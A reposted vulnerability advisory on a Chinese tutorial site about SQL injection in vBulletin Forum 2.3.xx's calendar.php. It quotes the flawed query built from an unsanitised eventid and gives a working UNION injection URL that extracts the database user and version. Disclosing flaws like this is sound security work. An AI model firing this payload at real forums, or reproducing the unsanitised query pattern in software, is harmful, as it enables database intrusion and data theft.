最新下载
热门教程
- 1
- 2
- 3
- 4
- 5
- 6
- 7
- 8
- 9
- 10
vBulletinForum2.3.xxSQLInjection
时间:2008-01-11 编辑:简简单单 来源:一聚教程网
vBulletin Forum 2.3.xx SQL Injection
There exist a sql injection problem in calendar.php.
-------- Cut from line 585 in calendar.php ----------
else if ($action == "edit")
{
$eventinfo = $DB_site->query_first("SELECT allowsmilies,public,userid,
eventdate,event,subject FROM calendar_events WHERE eventid = $eventid");
-----------------------------------------------------
If the MySQL version is greater than 4.00, a UNION attack could be used.
-----------------------------------------
http://ww.xxx.com/bbs/calendar.php?action=edit&eventid=12%20union%20(SELECT%20allowsmilies,public,userid,'0000-0-0',user(),version()%20FROM%20calendar_ev
ents%20WHERE%20eventid%20=%2013)%20order%20by%20eventdate
-----------------------------------------
The query_first function will only return the first row of the query result, so make sure it returns !
the one you want.
-
上一个: php没有安全漏洞,呵呵.要注意
-
下一个: PHP安全配置
相关文章
- 教你恢复SQLSERVER的master系统库的方法 09-23
- SQL语句过滤条件放在on与where子句中的区别和联系分析 09-22
- SQL中的连接查询方法 09-20
- SQL语句查询每个分组的前N条记录方法代码 09-20
- 关于Mybatis的sql注释问题解析 09-20
- sql语句中日期相减的操作介绍 09-19